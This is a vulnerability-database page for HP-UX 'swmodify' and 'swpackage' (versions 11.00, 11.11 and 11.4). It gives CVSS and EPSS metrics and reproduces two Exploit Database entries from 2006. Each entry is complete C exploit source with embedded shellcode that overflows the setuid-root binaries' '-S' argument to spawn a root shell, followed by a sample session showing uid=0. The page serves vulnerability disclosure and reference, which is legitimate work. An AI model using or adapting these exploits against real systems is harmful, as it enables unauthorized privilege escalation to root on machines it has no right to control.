Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.6 |
|
AV:L/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 2634
Publication date : 2006-10-23 22h00 +00:00
Author : prdelka
EDB Verified : Yes
/* HP-UX swmodify buffer overflow exploit
* =======================================
* HP-UX 'swmodify' contains an exploitable stack overflow
* in the handling of command line arguements. Specifically the
* problem occurs due to insufficent bounds checking in the "-S"
* optional arguement. 'swmodify' is installed setuid root by
* default in HP-UX and allows for local root compromise when
* exploiting this issue.
*
* Example.
* $ cc prdelka-vs-HPUX-swmodify.c -o prdelka-vs-HPUX-swmodify
* /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file
* (prdelka-vs-HPUX-swmodify.o) was detected. The linked output may
* not run on a PA 1.x system.
* $ uname -a
* HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license
* $ id
* uid=102(user) gid=20(users)
* $ ls -al /usr/sbin/swmodify
* -r-sr-xr-x 2 root bin 1323008 Nov 3 2003 /usr/sbin/swmodify
* $ ./prdelka-vs-HPUX-swmodify
* [ HP-UX 11i 'swmodify' local root exploit
* $ id
* uid=0(root) gid=3(sys) euid=102(user) egid=20(users)
*
* - prdelka
*/
char shellcode[]=
"\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\xb4\x16\x70\x16""/bin/sh";
int main(){
char adr[4],*b,*a,*c,*envp[1];
int i;
*(unsigned long*)adr=0x7f7f0434;
printf("[ HP-UX 11i 'swmodify' local root exploit\n");
b=(char*)malloc(2048);
a=b;
memset(b,0,2048);
memset(b,'a',1053);
b+=1053;
for(i=0;i<4;i++) *b++=adr[i%4];
*b++="A";
c=(char*)malloc(2048);
b=c;
memset(c,0,2048);
sprintf(c,"PATH=");
b+=5;
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
envp[0]=c;
envp[1]=0;
execle("/usr/sbin/swmodify","swmodify","-S",a,0,envp);
}
// milw0rm.com [2006-10-24]
Exploit Database EDB-ID : 2633
Publication date : 2006-10-23 22h00 +00:00
Author : prdelka
EDB Verified : Yes
/* HP-UX swpackage buffer overflow exploit
* =======================================
* HP-UX 'swpackage' contains an exploitable stack overflow
* in the handling of command line arguements. Specifically the
* problem occurs due to insufficent bounds checking in the "-S"
* optional arguement. 'swpackage' is installed setuid root by
* default in HP-UX and allows for local root compromise when
* exploiting this issue.
*
* Example.
* $ cc prdelka-vs-HPUX-swpackage.c -o prdelka-vs-HPUX-swpackage
* /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file
* (prdelka-vs-HPUX-swpackage.o) was detected. The linked output may
* not run on a PA 1.x system.
* $ uname -a
* HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license
* $ id
* uid=102(user) gid=20(users)
* $ ls -al /usr/sbin/swpackage
* -r-sr-xr-x 2 root bin 1323008 Nov 3 2003 /usr/sbin/swpackage
* $ ./prdelka-vs-HPUX-swpackage
* [ HP-UX 11i 'swpackage' local root exploit
* $ id
* uid=0(root) gid=3(sys) euid=102(user) egid=20(users)
*
* - prdelka
*/
char shellcode[]=
"\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\xb4\x16\x70\x16""/bin/sh";
int main(){
char adr[4],*b,*a,*c,*envp[1];
int i;
*(unsigned long*)adr=0x7f7f0434;
printf("[ HP-UX 11i 'swpackage' local root exploit\n");
b=(char*)malloc(2048);
a=b;
memset(b,0,2048);
memset(b,'a',1053);
b+=1053;
for(i=0;i<4;i++) *b++=adr[i%4];
c=(char*)malloc(2048);
b=c;
memset(c,0,2048);
sprintf(c,"PATH=");
b+=5;
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
envp[0]=c;
envp[1]=0;
execle("/usr/sbin/swpackage","swpackage","-S",a,0,envp);
}
// milw0rm.com [2006-10-24]
Products Mentioned
Configuraton 0
Hp>>Hp-ux >> Version 11.00
Hp>>Hp-ux >> Version 11.4
Hp>>Hp-ux >> Version 11.11
References